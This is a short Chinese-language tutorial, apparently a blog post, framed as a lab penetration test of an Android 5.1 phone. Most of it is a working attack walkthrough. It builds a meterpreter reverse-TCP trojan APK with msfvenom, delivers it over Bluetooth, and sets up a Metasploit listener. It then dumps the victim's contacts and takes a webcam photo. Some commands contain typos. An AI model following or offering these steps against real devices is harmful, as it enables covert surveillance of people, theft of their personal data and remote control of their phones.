前言
本次滲透為靶機測試。切勿用於非法用途!
攻擊者:192.168.1.3 termux+metasploit
受害者:192.168.1.2 Android 5.1 - Linux 3.10.72+ (aarch64)
使用模組:multi/handler
首先生成安卓木馬
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=3800 -o s.apk
將其移動到/storage/emulated/0/360目錄。並使用藍芽傳送給受害者者。
受害者安裝即可。回到攻擊者,啟動msfconsole。首先選擇模組
use exploit multi/handler
設定監聽地址
set lhost 192.168.1.3
設定反彈埠
set lprot 3800
設定playload
set payload android/meterpreter/reverse_tcp
啟動
run
成功。試試執行命令。系統資訊。
sysinfo
試試下載通訊錄
dump_contacts
成功儲存為txt檔案。後面因為長時間未操作自動斷開了。
試試拍照
webcam_snap
成功儲存在files目錄下。還有很多危險功能我就不一一說明了。一些來路不明的apk切勿安裝。
最新評論